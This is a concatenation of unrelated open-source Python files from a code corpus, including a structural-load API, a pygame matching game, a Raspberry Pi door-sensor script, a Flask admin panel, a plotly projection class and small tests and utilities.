clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = SolidSetLoadType.LOAD_TYPE_FORCE.name
# Load Distribution
clientObject.load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Load Direction
clientObject.load_direction = load_direction.name
# Load Magnitude
clientObject.uniform_magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
def Temperature(self,
no: int = 1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_parameter = None,
comment: str = '',
params: dict = {}):
'''
load_parameter:
LOAD_DISTRIBUTION_UNIFORM: load_parameter = magnitude
LOAD_DISTRIBUTION_LINEAR_IN_X: load_parameter = [magnitude_1, magnitude_2, node_1, node_2]
LOAD_DISTRIBUTION_LINEAR_IN_Y: load_parameter = [magnitude_1, magnitude_2, node_1, node_2]
LOAD_DISTRIBUTION_LINEAR_IN_Z: load_parameter = [magnitude_1, magnitude_2, node_1, node_2]
params:
{''}
'''
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = SolidSetLoadType.LOAD_TYPE_TEMPERATURE.name
# Load Distribution
if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM":
clientObject.uniform_magnitude = load_parameter
else:
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.node_1 = load_parameter[2]
clientObject.node_2 = load_parameter[3]
clientObject.load_distribution = load_distribution.name
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
def Strain(self,
no: int = 1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_parameter = None,
comment: str = '',
params: dict = {}):
'''
load_parameter:
LOAD_DISTRIBUTION_UNIFORM: load_parameter = [strain_uniform_magnitude_x, strain_uniform_magnitude_y, strain_uniform_magnitude_z]
LOAD_DISTRIBUTION_LINEAR_IN_X: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2]
LOAD_DISTRIBUTION_LINEAR_IN_Y: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2]
LOAD_DISTRIBUTION_LINEAR_IN_Z: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2]
params:
{''}
'''
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = SolidSetLoadType.LOAD_TYPE_STRAIN.name
# Load Distribution
if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM":
clientObject.strain_uniform_magnitude_x = load_parameter[0]
clientObject.strain_uniform_magnitude_y = load_parameter[1]
clientObject.strain_uniform_magnitude_z = load_parameter[2]
else:
clientObject.strain_magnitude_x1 = load_parameter[0]
clientObject.strain_magnitude_y1 = load_parameter[1]
clientObject.strain_magnitude_z1 = load_parameter[2]
clientObject.strain_magnitude_x2 = load_parameter[3]
clientObject.strain_magnitude_y2 = load_parameter[4]
clientObject.strain_magnitude_z2 = load_parameter[5]
clientObject.node_1 = load_parameter[6]
clientObject.node_2 = load_parameter[7]
clientObject.load_distribution = load_distribution.name
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
def Motion(self,
no: int = 1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_parameter = None,
comment: str = '',
params: dict = {}):
'''
load_parameter:
load_parameter = [angular_velocity, angular_acceleration, axis_definition_p1_x, axis_definition_p1_y, axis_definition_p1_z, axis_definition_p2_x, axis_definition_p2_y, axis_definition_p2_z]
params:
{''}
'''
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = SolidSetLoadType.LOAD_TYPE_ROTARY_MOTION.name
# Velocity
clientObject.angular_velocity = load_parameter[0]
# Acceleration
clientObject.angular_acceleration = load_parameter[1]
# Axis Definition
clientObject.axis_definition_p1_x = load_parameter[2]
clientObject.axis_definition_p1_y = load_parameter[3]
clientObject.axis_definition_p1_z = load_parameter[4]
clientObject.axis_definition_p2_x = load_parameter[5]
clientObject.axis_definition_p2_y = load_parameter[6]
clientObject.axis_definition_p2_z = load_parameter[7]
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
#def Buoyancy():
# print('The function Buoyancy() is not implemented yet.')
#def Gas():
# print('The function Gas() is not implemented yet.')
| 2.265625 | 2 |
examples_2d/patch.py | 5A5H/PyFEMP | 1 | 11059 | <gh_stars>1-10
# 2D example tensile test
import numpy as np
import matplotlib.pyplot as plt
import PyFEMP
import PyFEMP.elements.Elmt_BaMo_2D as ELEMENT
FEM = PyFEMP.FEM_Simulation(ELEMENT)
n = 4
XI, Elem = PyFEMP.msh_rec([0.0, 0.0], [10.0, 10.0], [n, n], type='Q1')
FEM.Add_Mesh(XI, Elem)
FEM.Add_Material([2100, 0.3], "All")
FEM.Add_EBC("x==0", "UX", 0)
FEM.Add_EBC("y==0", "UY", 0)
FEM.Add_EBC("x==10", "UX", 1)
FEM.Analysis()
FEM.NextStep(1.0, 1.0)
print( FEM.NewtonIteration() )
print( FEM.NewtonIteration() )
ux = FEM.NodalDof("x==10 and y==10", "UX")
uy = FEM.NodalDof("x==10 and y==10", "UY")
print('ux :',ux, 'uy :',uy)
fig, ax = plt.subplots(1,1, figsize=(8.0, 8.0))
postplot = FEM.ShowMesh(ax, ec='b', label='reference config.')
postplot = FEM.ShowMesh(ax, deformedmesh=True, ec='r', label='current config.')
ax.legend()
plt.show() | 2.5 | 2 |
common-patterns/producer_consumer_client.py | kyeett/websockets-examples | 0 | 11060 | <reponame>kyeett/websockets-examples
#!/usr/bin/env python
import asyncio
import websockets
import os
port = int(os.environ.get('PORT', '8765'))
async def hello():
print("Starting client on :%s" % port)
async with websockets.connect('ws://localhost:%s' % port) as websocket:
msg = 'Client msg #1'
await websocket.send(msg)
print('> {}'.format(msg))
i = 0
while True:
greeting = await websocket.recv()
i += 1
print("< {}".format(greeting))
asyncio.get_event_loop().run_until_complete(hello())
| 3.46875 | 3 |
wagtailflags/forms.py | cfpb/wagtail-flags | 75 | 11061 | <filename>wagtailflags/forms.py
from django import forms
from flags.forms import FlagStateForm as DjangoFlagsFlagStateForm
from flags.models import FlagState
from flags.sources import get_flags
class NewFlagForm(forms.ModelForm):
name = forms.CharField(label="Name", required=True)
def clean_name(self):
name = self.cleaned_data["name"]
if name in get_flags():
raise forms.ValidationError(
"Flag named {} already exists".format(name)
)
return name
def save(self, commit=True):
obj = super(NewFlagForm, self).save(commit=False)
obj.condition = "boolean"
obj.value = "False"
obj.required = False
obj.save()
return obj
class Meta:
model = FlagState
fields = ("name",)
class FlagStateForm(DjangoFlagsFlagStateForm):
name = forms.CharField(
label="Flag",
required=True,
disabled=True,
widget=forms.HiddenInput(),
)
class Meta:
model = FlagState
fields = ("name", "condition", "value", "required")
| 2.296875 | 2 |
src/utils/utils.py | GuiYuDaniel/CGC_of_Sn | 0 | 11062 | <reponame>GuiYuDaniel/CGC_of_Sn<filename>src/utils/utils.py
# -*- coding:utf8 -*-
"""
一些其他工具
当需要细化或者函数太多时,应该把其中一些独立出去
"""
import uuid
from enum import Enum, unique
from utils.log import get_logger
logger = get_logger(__name__)
@unique
class PipeTaskStatus(Enum): # 还不够需要写状态机,先用这个凑活一下
"""
name is Status
value is Next
"""
# TODO 多线程时应该增加STOPPING, WAITING等状态
# TODO 为了避免Enum键值对别名的规则,引入一个None占位,None无意义,不是一个状态!
PREPARATION = ["DOING", "FAIL"] # preparation是准备阶段,计算、保存一切运行的必要信息,未准备结束的ppt是不支持restart的
DOING = ["SUCCESS", "FAIL", "RESTARTING"]
SUCCESS = []
FAIL = ["RESTARTING"]
RESTARTING = ["DOING", "FAIL", None] # restarting是重启的准备阶段,准备好后直接进入doing
# STOPPING = []
# WAITING = []
def new_id(is_log=True):
_id = str(uuid.uuid4())
if is_log:
logger.debug("new an id={} with uuid4 method".format(_id))
return _id
| 2.265625 | 2 |
extras/scripts/finish_ci.py | connornishijima/PixieChroma | 20 | 11063 | <reponame>connornishijima/PixieChroma
# This is just for GitHub, and is used to clean up leftover files after
# automatic testing has completed, and generate developer reports about
# anything left undocumented!
# run: "sudo python ./extras/scripts/finish_ci.py"
import os
import sys
os.system("sudo python ./extras/scripts/generate_doxygen_report.py")
os.system("sudo python ./extras/scripts/generate_keywords_report.py")
os.system("sudo python ./extras/scripts/generate_overview_report.py")
print("Cleaning up CI junk...")
os.system("ls .")
os.system("git add *")
os.system("sudo rm -r *.tar*")
os.system("sudo rm -r examples/*/build")
os.system("git commit -a -m 'Automated Cleanup'")
os.system("git push")
print("Done!" )
| 2.296875 | 2 |
matchingGame.py | VinnieM-3/MemoryGames | 0 | 11064 | import pygame
import random
pygame.init()
pygame.font.init()
class Card(object):
""" The Card Class """
def __init__(self, left, top, width, height,
back_color, front_color, solved_color,
display,
font_color, text_font, value=None):
self._rect = pygame.Rect(left, top, width, height)
self._display = display
self._back_color = back_color # color of card when face down
self._front_color = front_color # color of card when face up
self._solved_color = solved_color # color of card after it is matched
self._font_color = font_color
self._text_font = text_font
self._value = value # the number we are trying to match
self._unsolved = True # is set to false once matched
self._hidden = True # card is face down to start
self._times_seen = 0 # number of times player viewed card
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
@property
def times_seen(self):
return self._times_seen
def solved(self):
self._unsolved = False
pygame.draw.rect(self._display, self._solved_color, self._rect)
def is_unsolved(self):
return self._unsolved
def is_clicked(self, pos):
x_pos, y_pos = pos
return self._rect.collidepoint(x_pos, y_pos) # did player click on this card?
def is_hidden(self):
return self._hidden
def show_card(self):
self._hidden = False
self._times_seen += 1
pygame.draw.rect(self._display, self._front_color, self._rect)
text_surface = self._text_font.render(self._value, True, self._font_color)
self._display.blit(text_surface, (self._rect.center[0] - (text_surface.get_width() / 2),
self._rect.center[1] - (text_surface.get_height() / 2)))
def hide_card(self):
self._hidden = True
pygame.draw.rect(self._display, self._back_color, self._rect)
def get_matching_card(card_list, card_to_match):
""" This function returns the card that matches the one passed in """
the_matching_card = None
for test_card in card_list:
if test_card.value == card_to_match.value and test_card != card_to_match:
the_matching_card = test_card
break
return the_matching_card
def cards_remaining(card_list):
""" this function returns the number of cards that have not been matched yet """
num_remaining = 0
for c in card_list:
if c.is_unsolved():
num_remaining += 1
return num_remaining
if __name__ == "__main__":
display_width = 600
display_height = 600
card_font = pygame.font.SysFont('Comic Sans MS', 48)
front_col = pygame.Color('white')
solved_col = pygame.Color('#636363')
back_col = pygame.Color('#293a32')
font_col = pygame.Color('black')
score_font = pygame.font.SysFont('Comic Sans MS', 24)
score_txt_col = pygame.Color('#d4c38f')
score_y_margin = 50
score_x_margin = 20
player_closed_app = False
new_game = False
cards = []
game_display = pygame.display.set_mode((display_width, display_height))
pygame.display.set_caption('Matching Game')
game_display.fill(pygame.Color('#b5c9a6'))
score_rect = pygame.draw.rect(game_display, pygame.Color('black'), pygame.Rect(0, 0, display_width, score_y_margin))
surf_8x8_txt = score_font.render("8 x 8", True, score_txt_col)
left_pos = (game_display.get_width() - score_x_margin - surf_8x8_txt.get_width())
surf_8x8_rect = game_display.blit(surf_8x8_txt, (left_pos, (score_y_margin - surf_8x8_txt.get_height()) / 2))
surf_6x6_txt = score_font.render("6 x 6", True, score_txt_col)
left_pos = left_pos - surf_6x6_txt.get_width() - score_x_margin
surf_6x6_rect = game_display.blit(surf_6x6_txt, (left_pos, (score_y_margin - surf_6x6_txt.get_height()) / 2))
surf_4x4_txt = score_font.render("4 x 4", True, score_txt_col)
left_pos = left_pos - surf_4x4_txt.get_width() - score_x_margin
surf_4x4_rect = game_display.blit(surf_4x4_txt, (left_pos, (score_y_margin - surf_4x4_txt.get_height()) / 2))
surf_sel_txt = score_font.render("Select Game:", True, score_txt_col)
left_pos = left_pos - surf_sel_txt.get_width() - score_x_margin
game_display.blit(surf_sel_txt, (left_pos, (score_y_margin - surf_sel_txt.get_height()) / 2))
num_cols = 0
num_rows = 0
pick_1 = None # variable to hold first card selected by player
score = 0
max_score = 0 # maximum score a player can get
while not player_closed_app:
for event in pygame.event.get():
if event.type == pygame.QUIT:
player_closed_app = True
if new_game:
pygame.draw.rect(game_display, pygame.Color('#b5c9a6'),
pygame.Rect(0, score_y_margin, display_width, display_height - score_y_margin))
total_pairs = (num_cols * num_rows) / 2
max_score = total_pairs - 1 # player gets no credit for last two cards remaining
pairs = range(1, total_pairs + 1) + range(1, total_pairs + 1) # create numbered pairs
# calculate the width and height of the cards and the space between them
card_horz_width = int((display_width * 0.8) / num_cols)
space_horz_width = int((display_width * 0.2) / (num_cols + 1))
card_vert_height = int(((display_height - score_y_margin) * 0.8) / num_rows)
space_vert_height = int(((display_height - score_y_margin) * 0.2) / (num_rows + 1))
# create cards and randomly assign the numbered pairs
random.random()
del cards[:]
for row in range(1, num_rows + 1):
for col in range(1, num_cols + 1):
rnd_item = random.choice(pairs)
pairs.remove(rnd_item)
new_card_x = ((col - 1) * card_horz_width) + (col * space_horz_width)
new_card_y = ((row - 1) * card_vert_height) + (row * space_vert_height) + score_y_margin
crd = Card(new_card_x, new_card_y, card_horz_width, card_vert_height,
back_col, front_col, solved_col, game_display, font_col, card_font, str(rnd_item))
cards.append(crd)
crd.hide_card()
score = 0
new_game = False
if pygame.mouse.get_pressed()[0]:
if surf_4x4_rect.collidepoint(pygame.mouse.get_pos()): # start new game 4 x 4
new_game = True
num_cols = 4
num_rows = 4
pygame.time.wait(200) # wait 200ms to avoid multiple new game mouse click events
if surf_6x6_rect.collidepoint(pygame.mouse.get_pos()): # start new game 6 x 6
new_game = True
num_cols = 6
num_rows = 6
pygame.time.wait(200)
if surf_8x8_rect.collidepoint(pygame.mouse.get_pos()): # start new game 8 x 8
new_game = True
num_cols = 8
num_rows = 8
pygame.time.wait(200)
for crd in cards:
if crd.is_clicked(pygame.mouse.get_pos()) and crd.is_hidden() and crd.is_unsolved():
crd.show_card()
pygame.display.flip()
if pick_1 is None:
pick_1 = crd # player picked first card
else: # player picked second card.
if pick_1.value == crd.value: # it is a match!
pick_1.solved()
crd.solved()
if crd.times_seen > 1 and cards_remaining(cards) > 0:
score += 1 # if you have seen the matching card at least once before, you get a point
elif crd.times_seen == 1 and cards_remaining(cards) > 0:
max_score -= 1 # no points for luck, we just reduce the max possible score
pygame.time.wait(500) # show matching values for 500ms
else: # it did not match
pick_1.hide_card()
crd.hide_card()
matching_card = get_matching_card(cards, pick_1)
if matching_card.times_seen > 0:
score -= 1 # player has seen the matching card before! 1 point penalty!
if crd.times_seen > 1:
score -= 1 # player should have known this card was not a match! 1 point penalty!
pygame.time.wait(1500) # show card values for 1.5sec
pick_1 = None # get ready for next pair of selections by player
break
# update score
surf_wrong = score_font.render("Score = " + str(score) + " out of " + str(max_score), True, score_txt_col)
pygame.draw.rect(game_display, pygame.Color('black'),
pygame.Rect(score_x_margin, 0, surf_wrong.get_width() + 100, score_y_margin))
game_display.blit(surf_wrong, (score_x_margin, (score_y_margin - surf_wrong.get_height()) / 2))
pygame.display.flip()
# player existed application
pygame.quit()
quit()
| 3.578125 | 4 |
darts_search_space/imagenet/rlnas/evolution_search/config.py | megvii-model/RLNAS | 17 | 11065 | import os
class config:
host = 'zhangxuanyang.zhangxuanyang.ws2.hh-c.brainpp.cn'
username = 'admin'
port = 5672
exp_name = os.path.dirname(os.path.abspath(__file__))
exp_name = '-'.join(i for i in exp_name.split(os.path.sep) if i);
test_send_pipe = exp_name + '-test-send_pipe'
test_recv_pipe = exp_name + '-test-recv_pipe'
net_cache = 'model_and_data/checkpoint_epoch_50.pth.tar'
initial_net_cache = 'model_and_data/checkpoint_epoch_0.pth.tar'
layers = 14
edges = 14
model_input_size = (1, 3, 224, 224)
# Candidate operators
blocks_keys = [
'none',
'max_pool_3x3',
'avg_pool_3x3',
'skip_connect',
'sep_conv_3x3',
'sep_conv_5x5',
'dil_conv_3x3',
'dil_conv_5x5'
]
op_num = len(blocks_keys)
# Operators encoding
NONE = 0
MAX_POOLING_3x3 = 1
AVG_POOL_3x3 = 2
SKIP_CONNECT = 3
SEP_CONV_3x3 = 4
SEP_CONV_5x5 = 5
DIL_CONV_3x3 = 6
DIL_CONV_5x5 = 7
time_limit=None
#time_limit=0.050
speed_input_shape=[32,3,224,224]
flops_limit=True
max_flops=600*1e6
# max_flops=None
max_epochs=20
select_num = 10
population_num = 50
mutation_num = 25
m_prob = 0.1
crossover_num = 25
momentum = 0.7
eps = 1e-5
# Enumerate all paths of a single cell
paths = [[0, 2, 3, 4, 5], [0, 2, 3, 5], [0, 2, 4, 5], [0, 2, 5], [0, 3, 4, 5], [0, 3, 5], [0, 4, 5], [0, 5],
[1, 2, 3, 4, 5], [1, 2, 3, 5], [1, 2, 4, 5], [1, 2, 5], [1, 3, 4, 5], [1, 3, 5], [1, 4, 5], [1, 5],
[0, 2, 3, 4], [0, 2, 4], [0, 3, 4], [0, 4],
[1, 2, 3, 4], [1, 2, 4], [1, 3, 4], [1, 4],
[0, 2, 3], [0, 3],
[1, 2, 3], [1, 3],
[0, 2],
[1, 2]]
for i in ['exp_name']:
print('{}: {}'.format(i,eval('config.{}'.format(i))))
| 1.5625 | 2 |
packages/python/plotly/plotly/graph_objs/layout/geo/_projection.py | eranws/plotly.py | 0 | 11066 | <reponame>eranws/plotly.py<filename>packages/python/plotly/plotly/graph_objs/layout/geo/_projection.py<gh_stars>0
from plotly.basedatatypes import BaseLayoutHierarchyType as _BaseLayoutHierarchyType
import copy as _copy
class Projection(_BaseLayoutHierarchyType):
# class properties
# --------------------
_parent_path_str = "layout.geo"
_path_str = "layout.geo.projection"
_valid_props = {"parallels", "rotation", "scale", "type"}
# parallels
# ---------
@property
def parallels(self):
"""
For conic projection types only. Sets the parallels (tangent,
secant) where the cone intersects the sphere.
The 'parallels' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'parallels[0]' property is a number and may be specified as:
- An int or float
(1) The 'parallels[1]' property is a number and may be specified as:
- An int or float
Returns
-------
list
"""
return self["parallels"]
@parallels.setter
def parallels(self, val):
self["parallels"] = val
# rotation
# --------
@property
def rotation(self):
"""
The 'rotation' property is an instance of Rotation
that may be specified as:
- An instance of :class:`plotly.graph_objs.layout.geo.projection.Rotation`
- A dict of string/value properties that will be passed
to the Rotation constructor
Supported dict properties:
lat
Rotates the map along meridians (in degrees
North).
lon
Rotates the map along parallels (in degrees
East). Defaults to the center of the
`lonaxis.range` values.
roll
Roll the map (in degrees) For example, a roll
of 180 makes the map appear upside down.
Returns
-------
plotly.graph_objs.layout.geo.projection.Rotation
"""
return self["rotation"]
@rotation.setter
def rotation(self, val):
self["rotation"] = val
# scale
# -----
@property
def scale(self):
"""
Zooms in or out on the map view. A scale of 1 corresponds to
the largest zoom level that fits the map's lon and lat ranges.
The 'scale' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["scale"]
@scale.setter
def scale(self, val):
self["scale"] = val
# type
# ----
@property
def type(self):
"""
Sets the projection type.
The 'type' property is an enumeration that may be specified as:
- One of the following enumeration values:
['equirectangular', 'mercator', 'orthographic', 'natural
earth', 'kavrayskiy7', 'miller', 'robinson', 'eckert4',
'azimuthal equal area', 'azimuthal equidistant', 'conic
equal area', 'conic conformal', 'conic equidistant',
'gnomonic', 'stereographic', 'mollweide', 'hammer',
'transverse mercator', 'albers usa', 'winkel tripel',
'aitoff', 'sinusoidal']
Returns
-------
Any
"""
return self["type"]
@type.setter
def type(self, val):
self["type"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
parallels
For conic projection types only. Sets the parallels
(tangent, secant) where the cone intersects the sphere.
rotation
:class:`plotly.graph_objects.layout.geo.projection.Rota
tion` instance or dict with compatible properties
scale
Zooms in or out on the map view. A scale of 1
corresponds to the largest zoom level that fits the
map's lon and lat ranges.
type
Sets the projection type.
"""
def __init__(
self, arg=None, parallels=None, rotation=None, scale=None, type=None, **kwargs
):
"""
Construct a new Projection object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.layout.geo.Projection`
parallels
For conic projection types only. Sets the parallels
(tangent, secant) where the cone intersects the sphere.
rotation
:class:`plotly.graph_objects.layout.geo.projection.Rota
tion` instance or dict with compatible properties
scale
Zooms in or out on the map view. A scale of 1
corresponds to the largest zoom level that fits the
map's lon and lat ranges.
type
Sets the projection type.
Returns
-------
Projection
"""
super(Projection, self).__init__("projection")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.layout.geo.Projection
constructor must be a dict or
an instance of :class:`plotly.graph_objs.layout.geo.Projection`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("parallels", None)
_v = parallels if parallels is not None else _v
if _v is not None:
self["parallels"] = _v
_v = arg.pop("rotation", None)
_v = rotation if rotation is not None else _v
if _v is not None:
self["rotation"] = _v
_v = arg.pop("scale", None)
_v = scale if scale is not None else _v
if _v is not None:
self["scale"] = _v
_v = arg.pop("type", None)
_v = type if type is not None else _v
if _v is not None:
self["type"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 2.828125 | 3 |
j3d/string_table.py | blank63/j3dview | 13 | 11067 | from btypes.big_endian import *
cstring_sjis = CString('shift-jis')
class Header(Struct):
string_count = uint16
__padding__ = Padding(2)
class Entry(Struct):
string_hash = uint16
string_offset = uint16
def unsigned_to_signed_byte(b):
return b - 0x100 if b & 0x80 else b
def calculate_hash(string):
h = 0
for b in string:
h = (h*3 + unsigned_to_signed_byte(b)) & 0xFFFF
return h
def pack(stream, strings):
strings = [string.encode('shift-jis') for string in strings]
header = Header()
header.string_count = len(strings)
Header.pack(stream, header)
offset = Header.sizeof() + Entry.sizeof()*len(strings)
for string in strings:
entry = Entry()
entry.string_hash = calculate_hash(string)
entry.string_offset = offset
Entry.pack(stream, entry)
offset += len(string) + 1
for string in strings:
stream.write(string)
stream.write(b'\0')
def unpack(stream):
base = stream.tell()
header = Header.unpack(stream)
entries = [Entry.unpack(stream) for _ in range(header.string_count)]
strings = []
for entry in entries:
stream.seek(base + entry.string_offset)
strings.append(cstring_sjis.unpack(stream))
return strings
| 2.6875 | 3 |
deConzSensors.py | peterstadler/deConzSensors | 0 | 11068 | #!/usr/bin/env python3.5
from time import sleep, time
from datetime import datetime, timedelta
from pid.decorator import pidfile
#from subprocess import call
from RPi import GPIO
import requests
import json
#import config
import logging
import signal
import sys
#13: grün
#16: braun
#19: orange
#20: grün
#21: braun
#26: orange
SENSORS = [
{
"GPIOpinIN": 26,
"GPIOpinOUT": 19,
"SENSORID": 4,
"NAME": "Garagentor"
},
{
"GPIOpinIN": 20,
"GPIOpinOUT": 13,
"SENSORID": 2,
"NAME": "Garagentür"
}
]
# deConz REST API settings
APIKEY = "" # API key for the deConz REST API
APIHOST = "" # IP address of the deConz REST API, e.g. "192.168.1.100"
APISCHEME = "http" # scheme for the deConz REST API, e.g. "http"
# program settings
POLL_INTERVALL = 7 # duration in seconds to wait between polls
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s', filename='/var/log/deConzSensors.log')
class mySensor:
def ping(self):
GPIO.output(self.gpio_out, 1)
sumOfStates = 0
for i in range(10): # get 10 samples of the door state
curState = GPIO.input(self.gpio_in)
logging.debug('current state of ' + self.name + ': ' + str(curState))
sumOfStates += curState
sleep(0.1)
GPIO.output(self.gpio_out, 0)
if sumOfStates < 5:
if self.door_open == False:
logging.info(self.name + ' opened')
self.door_open = True
setRemoteSensor(True, self.sensor_id)
else:
if self.door_open == True:
logging.info(self.name + ' closed')
setRemoteSensor(False, self.sensor_id)
self.door_open = False
#delta = (datetime.now() - self.open_since).seconds # delta in seconds between now and the door open state
#logging.debug(self.name + ': delta: ' + str(delta) + ' – GPIO input ' + str(self.gpio_in))
#if self.door_open and (delta > (2 * POLL_INTERVALL)): # only set remote sensor when we have 2 consecutive misses
# logging.warning(self.name + ' open')
# setRemoteSensor(True, self.sensor_id)
#self.door_open = True
#def updateLocalSettings(self, channel):
# logging.debug(self.name + ': Callback fired for GPIO input ' + str(channel))
# self.door_open = False
# self.open_since = datetime.now()
def __init__(self, sensor_config):
self.door_open = True
self.open_since = datetime.now()
self.gpio_in = sensor_config["GPIOpinIN"]
self.gpio_out = sensor_config["GPIOpinOUT"]
self.sensor_id = sensor_config["SENSORID"]
self.name = sensor_config["NAME"]
GPIO.setup(sensor_config["GPIOpinIN"], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(sensor_config["GPIOpinOUT"], GPIO.OUT, initial=GPIO.LOW)
#GPIO.add_event_detect(sensor_config["GPIOpinIN"], GPIO.RISING, callback=self.updateLocalSettings, bouncetime=250)
def terminate(signum, frame):
logging.info("******************** Terminating ******************** ")
logging.debug('Signal handler called with signal ' + str(signum))
GPIO.cleanup()
logging.info("************************ Exit *********************** ")
sys.exit(0)
def init():
logging.info("******************** Starting up ******************** ")
signal.signal(signal.SIGINT, terminate)
signal.signal(signal.SIGTERM, terminate)
GPIO.setmode(GPIO.BCM)
mySensors = []
for sensor in SENSORS:
logging.info("adding sensor '" + sensor["NAME"] + "' at GPIO pin " + str(sensor["GPIOpinIN"]))
mySensors.append(mySensor(sensor))
logging.info("***************************************************** ")
return mySensors
def setRemoteSensor(open, sensor_id):
url = APISCHEME + "://" + APIHOST + "/api/" + APIKEY + "/sensors/" + str(sensor_id) + "/state"
payload = {'open': str(open).lower()}
r = requests.put(url, data=json.dumps(payload))
r.raise_for_status()
logging.debug('setting remote sensor ' + str(sensor_id) + ' to ' + str(open))
# creating a PID file to prevent double execution of this script
@pidfile()
def main():
sensors=init() # initialize everything
while True: # idle loop
for sensor in sensors:
sensor.ping()
sleep(POLL_INTERVALL / len(sensors)) # sleep for the duration given as POLL_INTERVALL
if __name__ == '__main__':
main()
| 2.484375 | 2 |
src/admin.py | kappa243/agh-db-proj | 0 | 11069 | <filename>src/admin.py
from flask import Blueprint, request, render_template, flash, redirect, url_for
from flask_login import login_user, login_required, current_user, logout_user
from models import User
from werkzeug.security import generate_password_hash, check_password_hash
from app import db, login_manager
admin = Blueprint('admin', __name__)
@admin.route('/admin', methods=['POST', 'GET'])
@login_required
def admin_panel():
if current_user.is_authenticated:
user = User.query.get(int(current_user.get_id()))
if not user.admin:
return redirect(url_for('index'))
users = User.query.order_by(User.id).all()
if request.method == 'POST':
if 'edit_user' in request.form:
old_username = request.form['edit_user']
user = db.session.query(User).filter_by(username=old_username).with_for_update().first()
username = request.form['username']
password = request.form['password']
if len(username) > 0:
user.username = username
if len(password) > 0:
if len(password) >= 3:
user.password = generate_password_hash(password, method='<PASSWORD>')
else:
flash('Password must be minimum 3 characters long')
if 'grant_admin' in request.form:
user.admin = True
if 'remove_admin' in request.form:
user.admin = False
if 'delete' in request.form:
old_username = request.form['delete']
User.query.filter_by(username=old_username).with_for_update().delete()
db.session.commit()
return redirect(url_for('admin.admin_panel'))
return render_template('admin_panel.html', users=users)
| 2.40625 | 2 |
test/lib/test_map.py | oldmantaiter/inferno | 1 | 11070 | import datetime
import types
from nose.tools import eq_
from nose.tools import ok_
from inferno.lib.map import keyset_map
from inferno.lib.rule import InfernoRule
class TestKeysetMap(object):
def setUp(self):
self.data = {
'city': 'toronto',
'country': 'canada',
'population': 100,
'size': 1000,
'date': datetime.date(2012, 12, 01)}
self.rule = InfernoRule(
key_parts=['country', 'city'],
value_parts=['population', 'size'])
def test_keys_and_parts(self):
expected = [('["_default","canada","toronto"]', [100, 1000])]
self._assert_map(self.data, self.rule, expected)
def test_missing_key_part_should_not_yield_result(self):
del self.data['city']
expected = []
self._assert_map(self.data, self.rule, expected)
def test_missing_value_part_should_yield_result(self):
del self.data['size']
expected = [('["_default","canada","toronto"]', [100, 0])]
